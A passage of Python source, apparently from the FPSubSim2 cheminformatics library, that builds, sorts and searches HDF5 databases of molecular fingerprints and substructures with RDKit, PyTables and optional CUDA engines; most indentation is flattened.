fingerprint = [fp() for fp in Fingerprint.derived()]
if not isinstance(fingerprint, list):
fingerprint = [fingerprint]
# Ensure njobs is a correct value
if not isinstance(njobs, int) or njobs < -1:
raise ValueError('number of jobs must be -1 or above')
# set compression
filters = tb.Filters()
# set the output file and fps table
with tb.open_file(self.h5_filename, mode="w") as h5file:
# group to hold similarity tables
simil_group = h5file.create_group(
h5file.root, "similarity_info", "Infos for similarity search")
# group to hold substructure library
subst_group = h5file.create_group(
h5file.root, "substructure_info", "Infos for substructure search")
# Array containing processed binary of the substructure library
subst_table = h5file.create_earray(
subst_group, 'substruct_lib', tb.UInt64Atom(), (0,), 'Substructure search library')
# Table for mapping indices to identifiers
h5file.create_table(
h5file.root, 'mol_mappings',
np.dtype([("idnumber", "<i8"), ("connectivity", "S14"), ("InChIKey", "S27")]),
'Molecular mappings', expectedrows=1300000, filters=filters)
# Set config table containing rdkit version
param_table = h5file.create_vlarray(
h5file.root, "config", atom=tb.ObjectAtom())
param_table.append([rdkit.__version__, self.version, '3D' if self.is3d else '2D'])
# Create fingerprint tables
for fp_type in fingerprint:
fp_group = h5file.create_group(simil_group, repr(fp_type), f'Similarity {repr(fp_type)}')
particle = create_schema(fp_type.length)
fp_table = h5file.create_table(fp_group, 'fps', particle, 'Similarity FPs', expectedrows=1300000,
filters=filters)
fp_table.attrs.fp_type = fp_type.name
fp_table.attrs.fp_id = repr(fp_type)
fp_table.attrs.length = fp_type.length
fp_table.attrs.fp_params = json.dumps(fp_type.params)
# Get the number of molecules to process
if njobs in [0, 1]:
self._single_process_create(fingerprint, progress, total)
else:
self._parallel_create(njobs, fingerprint, progress, total)
self.load(self.h5_filename)
def load(self, fpsubsim_path: str):
"""Load an extended FPSim2 database to deal with multiple similarity
fingerprints and handle full substructure search (subgraph isomorphism).
:param fpsubsim_path: path to the FPSubSim2 library
"""
if not os.path.isfile(fpsubsim_path):
raise ValueError(f'File {fpsubsim_path} does not exist')
self.h5_filename = fpsubsim_path
with tb.open_file(self.h5_filename) as h5file:
rdkit_version, self.version, is3D = h5file.root.config.read()[0]
if rdkit.__version__ != rdkit_version:
warnings.warn(f'RDKit version {rdkit.__version__} differs: library was generated with {rdkit_version}. '
'Consider regenerating the FPSubSim2 library to avoid unexpected behaviour.')
self.is3d = is3D == "3D"
def _single_process_create(self, fingerprint: Union[Fingerprint, List[Fingerprint]], progress: bool = True,
total: Optional[int] = None):
"""Fill in the similarity tables from a unique process."""
with tb.open_file(self.h5_filename, mode="r+") as h5file:
# substructure rdkit library
lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
            # Links to groups and tables
subst_table = h5file.root.substructure_info.substruct_lib
mappings_table = h5file.root.mol_mappings
# Create fingerprints, mappings and substructure library
table_paths = {} # path to fp tables
fps = defaultdict(list) # data to be written into fp tables
mappings = []
for fp_type in fingerprint:
table_paths[repr(fp_type)] = f"/similarity_info/{repr(fp_type)}/fps"
with MolSupplier(source=self.sd_file, total=total, show_progress=progress,
start_id=1) as supplier:
for mol_id, rdmol in supplier:
# Add molecule to substructure search lib
lib.AddMol(rdmol)
# Get mapping information
props = rdmol.GetPropsAsDict()
connectivity = props.get('connectivity', '')
inchikey = props.get('InChIKey', Chem.MolToInchiKey(rdmol))
if not connectivity:
connectivity = inchikey.split('-')[0]
mappings.append((mol_id, connectivity, inchikey))
for fp_type in fingerprint:
# generate fingerprint
fp = fp_type.get(rdmol)
fps[fp_type].append((mol_id, *fp))
# flush buffer
if len(fps[fingerprint[0]]) == BATCH_WRITE_SIZE:
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).append(fps[fp_type])
mappings_table.append(mappings)
fps, mappings = defaultdict(list), []
# append last batch < 32k
if len(fps[fingerprint[0]]):
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).append(fps[fp_type])
h5file.get_node(table_paths[str(fp_type)]).flush()
mappings_table.append(mappings)
mappings_table.flush()
# create index so table can be sorted
for fp_type in fingerprint:
h5file.get_node(table_paths[str(fp_type)]).cols.popcnt.create_index(kind="full")
h5file.root.mol_mappings.cols.idnumber.create_index(kind="full")
# serialize substruct lib and pad
lib_bytes = lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
# save into h5
subst_table.attrs.padding = padding
subst_table.append(lib_ints)
# sort by popcounts
sort_db_file(self.h5_filename, verbose=progress)
def _parallel_create(self, njobs=-1, fingerprint: Union[Fingerprint, List[Fingerprint]] = None,
progress: bool = True, total: Optional[int] = None):
"""Fill in the similarity tables with multiple processes."""
# Fingerprint types and params to be passed to workers (instances are not thread safe)
fp_types = [(type(fp_type), fp_type.params) for fp_type in fingerprint]
# Mappings from fingerprint id to table path
table_paths = {repr(fp_type): f"/similarity_info/{repr(fp_type)}/fps" for fp_type in fingerprint}
# input and output queue
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
# define number of workers (keep 1 reader and 1 writer)
if njobs == -1:
n_cpus = multiprocessing.cpu_count() - 2 # number of threads (logical cores)
else:
n_cpus = njobs - 1
processes = []
# Start reader
reader = multiprocessing.Process(target=_reader_process, args=(self.sd_file, n_cpus, total, False, input_queue, output_queue))
processes.append(reader)
reader.start()
# Start writer
writer = multiprocessing.Process(target=_writer_process, args=(self.h5_filename, output_queue, table_paths, total, progress))
writer.start()
# Start workers
for i in range(n_cpus):
job = multiprocessing.Process(target=_worker_process, args=(fp_types, input_queue, output_queue, n_cpus))
processes.append(job)
processes[-1].start()
# Joining workers
while len(processes):
processes[0].join(10)
if not processes[0].is_alive():
del processes[0]
output_queue.put('STOP')
writer.join()
input_queue.close()
input_queue.join_thread()
output_queue.close()
output_queue.join_thread()
# sort by popcounts
sort_db_file(self.h5_filename, verbose=progress)
@property
def available_fingerprints(self):
if hasattr(self, '_avail_fp'):
return self._avail_fp
self._avail_fp = {}
with tb.open_file(self.h5_filename, mode="r") as h5file:
for simfp_group in h5file.walk_groups('/similarity_info/'):
if len(simfp_group._v_name):
fp_table = h5file.get_node(simfp_group, 'fps', classname='Table')
fp_type = fp_table.attrs.fp_type
fp_params = json.loads(fp_table.attrs.fp_params)
self._avail_fp[fp_table.attrs.fp_id] = get_fp_from_name(fp_type, **fp_params)
return self._avail_fp
def get_substructure_lib(self):
if not os.path.isfile(self.h5_filename):
raise ValueError('file must be created first')
        with tb.open_file(self.h5_filename, mode="r") as h5file:
            padding = h5file.root.substructure_info.substruct_lib.attrs.padding
            data = h5file.root.substructure_info.substruct_lib.read()
        raw = data.tobytes('C')
        if padding:  # strip the zero padding added before storage (slicing with -0 would drop everything)
            raw = raw[:-padding]
        with BytesIO(raw) as stream:
            lib = SubstructureLibrary(self.h5_filename)
            lib.InitFromStream(stream)
        return lib
def get_similarity_lib(self, fp_signature: Optional[str] = None, cuda: bool = False):
"""Obtain a similarity engine for the desired fingerprint.
:param fp_signature: Signature of the desired fingerprint
:param cuda: whether to run searches on the GPU
"""
if not os.path.isfile(self.h5_filename):
raise ValueError('file must be created first')
_ = self.available_fingerprints # initialize self._avail_fp
if fp_signature not in [*self._avail_fp.keys(), None]:
raise ValueError(f'fingerprint not available, choose one of {self._avail_fp.keys()}')
elif fp_signature is None:
fp_signature = list(self._avail_fp.keys())[0]
if cuda:
return FPSubSim2CudaEngine(self.h5_filename, fp_signature)
return FPSubSim2Engine(self.h5_filename, fp_signature)
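    # Usage sketch (comments only; `fpss` is an already loaded FPSubSim2 instance and the
    # SMILES is an arbitrary example):
    #     sim_engine = fpss.get_similarity_lib()          # first available fingerprint, CPU
    #     sub_lib = fpss.get_substructure_lib()           # RDKit-backed substructure library
    #     hits = sim_engine.similarity('c1ccccc1O', 0.7)  # pandas DataFrame of matches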
def add_fingerprint(self, fingerprint: Fingerprint, papyrus_sd_file: str, progress: bool = True, total: Optional[int]= None):
"""Add a similarity fingerprint to the FPSubSim2 database.
:param fingerprint: Fingerprint to be added
:param papyrus_sd_file: papyrus sd file containing chemical structures
:param progress: whether progress should be shown
:param total: number of molecules for progress display
"""
signature = str(fingerprint)
available_fps = [*self.available_fingerprints.keys()]
if signature in available_fps:
            print(f'fingerprint {signature} is already available')
return
backend = PyTablesMultiFpStorageBackend(self.h5_filename, available_fps[0])
backend.change_fp_for_append(fingerprint)
backend.append_fps(MolSupplier(source=papyrus_sd_file), total=total, progress=progress)
def add_molecules(self, papyrus_sd_file: str, progress: bool = True, total: Optional[int]= None):
"""Add molecules to the FPSubSim2 database.
:param papyrus_sd_file: papyrus sd file containing new chemical structures
:param progress: whether progress should be shown
:param total: number of molecules for progress display
"""
        for signature, fingerprint in self.available_fingerprints.items():
backend = PyTablesMultiFpStorageBackend(self.h5_filename, signature)
backend.append_fps(MolSupplier(source=papyrus_sd_file), total=total, progress=progress, sort=False)
substruct_lib = self.get_substructure_lib()
        for mol_id, rdmol in MolSupplier(source=papyrus_sd_file, total=total, show_progress=progress):
            if rdmol is not None:
                substruct_lib.AddMol(rdmol)
# serialize substruct lib and pad
lib_bytes = substruct_lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
# save into h5
with tb.open_file(self.h5_filename, mode="a") as h5file:
# Remove previous lib
h5file.remove_node(h5file.root.substructure_info.substruct_lib)
h5file.create_earray(h5file.root.substructure_info, 'substruct_lib', tb.UInt64Atom(), (0,), 'Substructure search library')
h5file.root.substructure_info.substruct_lib.attrs.padding = padding
h5file.root.substructure_info.substruct_lib.append(lib_ints)
sort_db_file(self.h5_filename, verbose=progress)
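# Updating an existing library in place (comments only; `fpss` is a loaded FPSubSim2
# instance, `new_fp` any supported Fingerprint instance and the SD file a placeholder):
#     fpss.add_fingerprint(new_fp, 'new_molecules.sdf')
#     fpss.add_molecules('new_molecules.sdf')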
def _reader_process(sd_file, n_workers, total, progress, input_queue, output_queue):
with MolSupplier(source=sd_file, total=total, show_progress=progress, start_id=1) as supplier:
count = 0
for mol_id, rdmol in supplier:
input_queue.put((mol_id, rdmol, rdmol.GetPropsAsDict()))
# Allow the queue to get emptied periodically
count += 1
if count > BATCH_WRITE_SIZE * n_workers * 1.5:
while input_queue.qsize() > BATCH_WRITE_SIZE:
time.sleep(10)
count = 0
for _ in range(n_workers):
input_queue.put('END')
def _writer_process(h5_filename, output_queue, table_paths, total, progress):
lib = SubstructLibrary(CachedMolHolder(), PatternHolder())
    pbar = tqdm(total=total, smoothing=0.0) if progress else {}  # dict.update() is a harmless no-op when progress is off
mappings_insert = []
similarity_insert = defaultdict(list)
with tb.open_file(h5_filename, mode="r+") as h5file:
while True:
data = output_queue.get()
if data == 'STOP':
# flush remnants of data
h5file.root.mol_mappings.append(mappings_insert)
for fp_id, fp_insert in similarity_insert.items():
h5file.get_node(table_paths[fp_id]).append(fp_insert)
# serialize substructure lib and pad
lib_bytes = lib.Serialize()
remainder = len(lib_bytes) % 8
padding = 8 - remainder if remainder else 0 # int64 are 8 bytes
if padding:
lib_bytes += b'\x00' * padding
lib_ints = np.frombuffer(lib_bytes, dtype=np.int64)
h5file.root.substructure_info.substruct_lib.attrs.padding = padding
h5file.root.substructure_info.substruct_lib.append(lib_ints)
# create index so tables can be sorted
for fp_table_path in table_paths.values():
h5file.get_node(fp_table_path).cols.popcnt.create_index(kind="full")
h5file.root.mol_mappings.cols.idnumber.create_index(kind="full")
break
if data[0] == 'mappings':
mappings_insert.append(data[1])
pbar.update()
elif data[0] == 'substructure':
lib.AddMol(data[1])
del data
elif data[0] == 'similarity':
fp_id, fp = data[1], data[2]
similarity_insert[fp_id].append(fp)
# insert data
if len(mappings_insert) > BATCH_WRITE_SIZE:
h5file.root.mol_mappings.append(mappings_insert)
h5file.root.mol_mappings.flush()
mappings_insert = []
if any(len(x) > BATCH_WRITE_SIZE for x in similarity_insert.values()):
for fp_id, fp_insert in similarity_insert.items():
h5file.get_node(table_paths[fp_id]).append(fp_insert)
h5file.get_node(table_paths[fp_id]).flush()
similarity_insert = defaultdict(list)
# ensure index in mol_mappings
with tb.open_file(h5_filename, mode="r+") as h5file:
h5file.root.mol_mappings.cols.idnumber.reindex()
return
def _worker_process(fp_types, input_queue, output_queue, n_workers):
while True:
# while output_queue.qsize() > BATCH_WRITE_SIZE * n_workers / 2:
# time.sleep(0.5)
data = input_queue.get()
if data == 'END':
# pass end signal to writing process
break
mol_id, rdmol, props = data
# put the molecule for the writer to handle substructure
output_queue.put(('substructure', rdmol))
# handle mappings
connectivity = props.get('connectivity', '')
        inchikey = props.get('InChIKey', Chem.MolToInchiKey(rdmol))
        if not connectivity:
            connectivity = inchikey.split('-')[0]
output_queue.put(('mappings', (mol_id, connectivity, inchikey)))
for fp_type, fp_params in fp_types:
fper = fp_type(**fp_params)
# generate fingerprint
fp = fper.get(rdmol)
output_queue.put(('similarity', repr(fper), (mol_id, *fp)))
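# Note on the parallel pipeline built from the three functions above: the reader feeds
# (mol_id, rdmol, props) tuples into `input_queue`; each worker converts them into
# ('substructure', rdmol), ('mappings', (id, connectivity, inchikey)) and
# ('similarity', fp_id, fp_row) messages on `output_queue`; the single writer owns the
# HDF5 file and the substructure library, flushes buffered rows every BATCH_WRITE_SIZE
# entries and finalises the indices when it receives 'STOP'.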
def sort_db_file(filename: str, verbose: bool=False) -> None:
"""Sorts the FPs db file."""
if verbose:
print('Optimizing FPSubSim2 file.')
# rename not sorted filename
tmp_filename = filename + "_tmp"
if os.path.isfile(tmp_filename):
os.remove(tmp_filename)
os.rename(filename, tmp_filename)
filters = tb.Filters(complib="blosc", complevel=1, shuffle=True, bitshuffle=True)
stats = {
"groups": 0,
"leaves": 0,
"links": 0,
"bytes": 0,
"hardlinks": 0,
}
# copy sorted fps and config to a new file
with tb.open_file(tmp_filename, mode="r") as fp_file:
with tb.open_file(filename, mode="w") as sorted_fp_file:
# group to hold similarity tables
siminfo_group = sorted_fp_file.create_group(sorted_fp_file.root, "similarity_info", "Infos for similarity search")
simfp_groups = list(fp_file.walk_groups('/similarity_info/'))
i = 0
for simfp_group in simfp_groups:
                if len(simfp_group._v_name):
                    i += 1
                    dst_group = simfp_group._f_copy(siminfo_group, recursive=False, filters=filters, stats=stats)
# progress bar
if verbose:
pbar = tqdm(list(fp_file.iter_nodes(simfp_group, classname='Table')),
desc=f'Optimizing tables of group ({i}/{len(simfp_groups)})',
leave=False)
else:
pbar = fp_file.iter_nodes(simfp_group, classname='Table')
for fp_table in pbar:
# create a sorted copy of the fps table
dst_fp_table = fp_table.copy(
dst_group,
fp_table.name,
filters=filters,
copyuserattrs=True,
overwrite=True,
stats=stats,
start=None,
stop=None,
step=None,
chunkshape="auto",
sortby="popcnt",
check_CSI=True,
propindexes=True,
)
# update count ranges
popcnt_bins = calc_popcnt_bins_pytables(dst_fp_table, fp_table.attrs.length)
popcounts = sorted_fp_file.create_vlarray(dst_group, 'popcounts', tb.ObjectAtom(), f'Popcounts of {dst_group._v_name}')
for x in popcnt_bins:
popcounts.append(x)
# add other tables
if verbose:
print('Optimizing remaining groups and arrays.')
for node in fp_file.iter_nodes(fp_file.root):
if isinstance(node, tb.group.Group):
if isinstance(node, tb.group.RootGroup) or 'similarity_info' in str(node):
continue
_ = node._f_copy(sorted_fp_file.root, node._v_name, overwrite=True, recursive=True, filters=filters, stats=stats)
else:
_ = node.copy(sorted_fp_file.root, node._v_name, overwrite=True, stats=stats)
# remove unsorted file
if verbose:
print('Cleaning up temporary files.')
os.remove(tmp_filename)
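# Usage sketch: sort_db_file is called automatically after a library is (re)built, but it
# can also be run by hand on an existing file (hypothetical name below):
#     sort_db_file('Papyrus_FPSubSim2.h5', verbose=True)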
class PyTablesMultiFpStorageBackend(BaseStorageBackend):
def __init__(self, fp_filename: str, fp_signature: str, in_memory_fps: bool = True, fps_sort: bool = False) -> None:
super(PyTablesMultiFpStorageBackend, self).__init__(fp_filename)
self.name = "pytables"
# Get table signatures
with tb.open_file(self.fp_filename, mode="r") as fp_file:
self._fp_table_mappings = {}
for simfp_group in fp_file.walk_groups('/similarity_info/'):
if len(simfp_group._v_name):
fp_table = fp_file.get_node(simfp_group, 'fps', classname='Table')
self._fp_table_mappings[fp_table.attrs.fp_id] = [f'/similarity_info/{simfp_group._v_name}/fps',
f'/similarity_info/{simfp_group._v_name}/popcounts']
if fp_signature not in self._fp_table_mappings.keys():
raise ValueError(f'fingerprint not available, must be one of {", ".join(self._fp_table_mappings.keys())}')
self._current_fp = fp_signature
self._current_fp_path = self._fp_table_mappings[fp_signature][0]
self._current_popcounts_path = self._fp_table_mappings[fp_signature][1]
self.fp_type, self.fp_params, self.rdkit_ver = self.read_parameters()
self._fp_func = get_fp_from_name(self.fp_type, **self.fp_params)
if in_memory_fps:
self.load_fps(in_memory_fps, fps_sort)
self.load_popcnt_bins(fps_sort)
with tb.open_file(self.fp_filename, mode="r") as fp_file:
self.chunk_size = fp_file.get_node(self._current_fp_path).chunkshape[0] * 120
def read_parameters(self) -> Tuple[str, Dict[str, Dict[str, dict]], str]:
"""Reads fingerprint parameters for the current fingerprint."""
with tb.open_file(self.fp_filename, mode="r") as fp_file:
            rdkit_ver = fp_file.root.config[0][0]
fp_table = fp_file.get_node(self._current_fp_path)
fp_type = fp_table.attrs.fp_type
fp_params = json.loads(fp_table.attrs.fp_params)
return fp_type, fp_params, rdkit_ver
    def get_fps_chunk(self, chunk_range: Tuple[int, int]) -> np.ndarray:
with tb.open_file(self.fp_filename, mode="r") as fp_file:
fps = fp_file.get_node(self._current_fp_path)[slice(*chunk_range)]
return fps
def load_popcnt_bins(self, fps_sort: bool) -> None:
if fps_sort:
popcnt_bins = self.calc_popcnt_bins(self.fps)
else:
with tb.open_file(self.fp_filename, mode="r") as fp_file:
popcnt_bins = fp_file.get_node(self._current_popcounts_path).read()
self.popcnt_bins = popcnt_bins
def load_fps(self, in_memory_fps, fps_sort) -> None:
"""Loads FP db file into memory for the current fingerprint.
Parameters
----------
in_memory_fps : bool
Whether if the FPs should be loaded into memory or not.
fps_sort: bool
Whether if the FPs should be sorted or not.
Returns
-------
fps: numpy array
Numpy array with the fingerprints.
"""
with tb.open_file(self.fp_filename, mode="r") as fp_file:
fps = fp_file.get_node(self._current_fp_path)[:]
# files should be sorted but if the file is updated without sorting it
# can be also in memory sorted
if fps_sort:
fps.sort(order="popcnt")
num_fields = len(fps[0])
fps = fps.view("<u8")
fps = fps.reshape(int(fps.size / num_fields), num_fields)
self.fps = fps
def delete_fps(self, ids_list: List[int]) -> None:
"""Delete FPs given a list of ids for the current fingerprint.
Parameters
----------
ids_list : list
ids to delete.
Returns
-------
None
"""
with tb.open_file(self.fp_filename, mode="a") as fp_file:
fps_table = fp_file.get_node(self._current_fp_path)
for fp_id in ids_list:
to_delete = [
row.nrow
for row in fps_table.where("fp_id == {}".format(str(fp_id)))
]
fps_table.remove_row(to_delete[0])
def append_fps(self, supplier: MolSupplier, progress: bool=True, total: Optional[int]=None, sort: bool = True) -> None:
"""Appends FPs to the file for the fingerprint currently selected."""
with tb.open_file(self.fp_filename, mode="a") as fp_file:
fps_table = fp_file.get_node(self._current_fp_path)
fps = []
supplier.set_start_progress_total(max((row['fp_id'] for row in fps_table.iterrows()), default=1),
progress, total)
for mol_id, rdmol in supplier:
if not rdmol:
continue
fp = self._fp_func.get(rdmol)
fps.append((mol_id, *fp))
if len(fps) == BATCH_WRITE_SIZE:
fps_table.append(fps)
fps = []
# append last batch < 32k
if fps:
fps_table.append(fps)
if sort:
sort_db_file(self.fp_filename, verbose=progress)
def change_fp_for_append(self, fingerprint: Fingerprint):
"""Create an empty table and change the fingerprint to be used for appending."""
self._current_fp = str(fingerprint)
# Determine schema
particle = create_schema(fingerprint.length)
filters = tb.Filters()
# Create table
with tb.open_file(self.fp_filename, mode="a") as fp_file:
# Group for new fingerprint
            fp_group = fp_file.create_group('/similarity_info/', self._current_fp, f'Similarity {self._current_fp}')
# New table
particle = create_schema(fingerprint.length)
fp_table = fp_file.create_table(fp_group, 'fps', particle, 'Similarity FPs', expectedrows=1300000,
filters=filters)
# New attributes
fp_table.attrs.fp_type = fingerprint.name
fp_table.attrs.fp_id = self._current_fp
fp_table.attrs.length = fingerprint.length
fp_table.attrs.fp_params = json.dumps(fingerprint.params)
# New Popcounts
popcounts = fp_file.create_vlarray(fp_group, 'popcounts', tb.ObjectAtom(), f'Popcounts of {fp_group._v_name}')
self._current_fp_path = f'/similarity_info/{fp_group._v_name}/fps'
self._current_popcounts_path = f'/similarity_info/{fp_group._v_name}/popcounts'
self.fp_type, self.fp_params, self.rdkit_ver = self.read_parameters()
self._fp_func = get_fp_from_name(self.fp_type, **self.fp_params)
print('Empty table created, make sure to call "append_fps" to populate it!')
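# Sketch of the two-step update flow the backend above supports (comments only; the
# signature, fingerprint object and SD file are placeholders):
#     backend = PyTablesMultiFpStorageBackend('Papyrus_FPSubSim2.h5', existing_signature)
#     backend.change_fp_for_append(new_fingerprint)           # creates the empty table
#     backend.append_fps(MolSupplier(source='papyrus.sdf'))   # fills it and re-sorts the file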
class BaseMultiFpEngine(BaseEngine, ABC):
def __init__(
self,
fp_filename: str,
fp_signature: str,
storage_backend: str,
in_memory_fps: bool,
fps_sort: bool,
) -> None:
self.fp_filename = fp_filename
self.in_memory_fps = in_memory_fps
if storage_backend == "pytables":
self.storage = PyTablesMultiFpStorageBackend(
fp_filename, fp_signature, in_memory_fps=in_memory_fps, fps_sort=fps_sort
)
def load_query(self, query_string: str) -> np.ndarray:
"""Loads the query molecule from SMILES, molblock or InChI.
Parameters
----------
query_string : str
SMILES, InChi or molblock.
Returns
-------
query : numpy array
Numpy array query molecule.
"""
rdmol = load_molecule(query_string)
if rdmol is None:
raise ValueError('molecule could not be parsed')
fp = get_fp_from_name(self.fp_type, **self.fp_params).get(rdmol)
return np.array((0, *fp), dtype=np.uint64)
def _get_mapping(self, ids: Union[List[int], int]):
"""Get the Papyrus identifiers corresponding to the given indices"""
if not isinstance(ids, list):
ids = [ids]
if not len(ids):
raise ValueError('indices must be supplied')
for id in ids:
if int(id) != id:
raise ValueError('indices must be integers')
with tb.open_file(self.fp_filename) as fp_file:
if max(ids) > max(fp_file.get_node(self.storage._current_fp_path).cols.fp_id):
raise ValueError(f'index not in database: {max(ids)}')
# Get data fields from mol_mappings table
mappings_table = fp_file.root.mol_mappings
colnames = mappings_table.cols._v_colnames
data = []
for id in ids:
pointer = mappings_table.where(f"idnumber == {id}")
try:
data.append(next(pointer).fetch_all_fields())
except StopIteration:
raise ValueError(f'could not find index {id}')
return pd.DataFrame.from_records(data, columns=colnames)
class FPSubSim2Engine(BaseMultiFpEngine, FPSim2Engine):
"""FPSubSim2 class to run fast CPU similarity searches."""
def __init__(
self,
fp_filename: str,
fp_signature: str,
in_memory_fps: bool = True,
fps_sort: bool = False,
storage_backend: str = "pytables",
) -> None:
"""FPSubSim2 class to run fast CPU similarity searches.
        :param fp_filename: Fingerprints database file path.
        :param fp_signature: Signature of the fingerprint to be used for searches.
        :param in_memory_fps: Whether the FPs should be loaded into memory.
        :param fps_sort: Whether the FPs should be sorted by popcnt after being loaded into memory.
        :param storage_backend: Storage backend to use (only pytables available at the moment).
"""
super(FPSubSim2Engine, self).__init__(
fp_filename=fp_filename,
fp_signature=fp_signature,
storage_backend=storage_backend,
in_memory_fps=in_memory_fps,
fps_sort=fps_sort,
)
self.empty_sim = np.ndarray((0,), dtype=[("mol_id", "<u4"), ("coeff", "<f4")])
self.empty_subs = np.ndarray((0,), dtype="<u4")
def similarity(self, query_string: str, threshold: float, n_workers: int = 1) -> pd.DataFrame:
"""Perform in-memory Tanimoto similarity search.
        :param query_string: query molecule as SMILES, InChI or molblock
        :param threshold: minimum Tanimoto similarity for a molecule to be reported
        :param n_workers: number of threads to parallelize the search over
        :return: pandas DataFrame of matches with identifiers and similarity values
"""
data = list(zip(*FPSim2Engine.similarity(self, query_string, threshold, n_workers)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
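    # Example of the call this method wraps (comments only; file name, signature and SMILES
    # are placeholders):
    #     engine = FPSubSim2Engine('Papyrus_FPSubSim2.h5', fp_signature)
    #     df = engine.similarity('CC(=O)Oc1ccccc1C(=O)O', 0.6)
    #     # df columns: idnumber, connectivity, InChIKey, 'Tanimoto > 0.6 (<fp_signature>)'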
def on_disk_similarity(self, query_string: str, threshold: float, n_workers: int=1, chunk_size: int=0):
"""Perform Tanimoto similarity search on disk.
        :param query_string: query molecule as SMILES, InChI or molblock
        :param threshold: minimum Tanimoto similarity for a molecule to be reported
        :param n_workers: number of threads to parallelize the search over
        :param chunk_size: number of fingerprints read from disk per chunk
        :return: pandas DataFrame of matches with identifiers and similarity values
"""
data = list(zip(*FPSim2Engine.on_disk_similarity(self, query_string, threshold, n_workers, chunk_size)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
data[f'Tanimoto > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def tversky(self, query_string: str, threshold: float, a: float, b: float, n_workers: int = 1):
"""Perform in-memory Tversky similarity search.
        :param query_string: query molecule as SMILES, InChI or molblock
        :param threshold: minimum Tversky similarity for a molecule to be reported
        :param a: Tversky weight of the query molecule's features
        :param b: Tversky weight of the database molecule's features
        :param n_workers: number of threads to parallelize the search over
        :return: pandas DataFrame of matches with identifiers and similarity values
"""
data = list(zip(*FPSim2Engine.tversky(self, query_string, threshold, a, b, n_workers)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tversky > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
        data[f'Tversky > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def on_disk_tversky(self, query_string: str, threshold: float, a: float, b: float, n_workers: int = 1, chunk_size: int = None):
"""Perform Tversky similarity search on disk.
        :param query_string: query molecule as SMILES, InChI or molblock
        :param threshold: minimum Tversky similarity for a molecule to be reported
        :param a: Tversky weight of the query molecule's features
        :param b: Tversky weight of the database molecule's features
        :param n_workers: number of threads to parallelize the search over
        :param chunk_size: number of fingerprints read from disk per chunk
        :return: pandas DataFrame of matches with identifiers and similarity values
"""
data = list(zip(*FPSim2Engine.on_disk_tversky(self, query_string, threshold, a, b, n_workers, chunk_size)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tversky > {threshold} ({self.storage._current_fp})'])
ids, similarities = data
ids, similarities = list(ids), list(similarities)
data = self._get_mapping(ids)
        data[f'Tversky > {threshold} ({self.storage._current_fp})'] = similarities
# Decode byte columns
for col, dtype in data.dtypes.items():
if dtype == object:
data[col] = data[col].apply(lambda x: x.decode('utf-8'))
return data
def substructure(self, query_string: str, n_workers: int = 1):
raise ValueError('use FPSubSim2 substructure library granting subgraph isomorphism')
def on_disk_substructure(self, query_string: str, n_workers: int = 1, chunk_size: int = None):
raise ValueError('use FPSubSim2 substructure library granting subgraph isomorphism')
class FPSubSim2CudaEngine(BaseMultiFpEngine, FPSim2CudaEngine):
"""FPSubSim2 class to run fast GPU similarity searches."""
def __init__(
self,
fp_filename: str,
fp_signature: str,
storage_backend: str = "pytables",
kernel: str='raw'
) -> None:
"""FPSubSim2 class to run fast CPU similarity searches.
:param fp_filename : Fingerprints database file path.
:param in_memory_fps: Whether if the FPs should be loaded into memory or not.
:param fps_sort: Whether if the FPs should be sorted by popcnt after being loaded into memory or not.
:param storage_backend: Storage backend to use (only pytables available at the moment).
"""
if isinstance(cupy, ImportError):
raise ImportError('Some required dependencies are missing:\n\tcupy')
super(FPSubSim2CudaEngine, self).__init__(
fp_filename=fp_filename,
fp_signature=fp_signature,
storage_backend=storage_backend,
in_memory_fps=True,
fps_sort=False,
)
if kernel not in ['raw', 'element_wise']:
raise ValueError("only supports 'raw' and 'element_wise' kernels")
self.kernel = kernel
if kernel == "raw":
# copy all the stuff to the GPU
self.cuda_db = cupy.asarray(self.fps[:, 1:-1])
self.cuda_ids = cupy.asarray(self.fps[:, 0])
self.cuda_popcnts = cupy.asarray(self.fps[:, -1])
self.cupy_kernel = cupy.RawKernel(
self.raw_kernel.format(block=self.cuda_db.shape[1]),
name="taniRAW",
options=("-std=c++14",),
)
elif self.kernel == "element_wise":
# copy the database to the GPU
self.cuda_db = cupy.asarray(self.fps)
self.cupy_kernel = cupy.ElementwiseKernel(
in_params="raw T db, raw U query, uint64 in_width, float32 threshold",
out_params="raw V out",
operation=self.ew_kernel,
name="taniEW",
options=("-std=c++14",),
reduce_dims=False,
)
def similarity(self, query_string: str, threshold: float) -> pd.DataFrame:
"""Tanimoto similarity search."""
data = list(zip(*FPSim2CudaEngine.similarity(self, query_string, threshold)))
if not len(data):
return pd.DataFrame([], columns=['idnumber', 'connectivity', 'InChIKey', f'Tanimoto > {threshold} ({self.storage._current_fp})'])
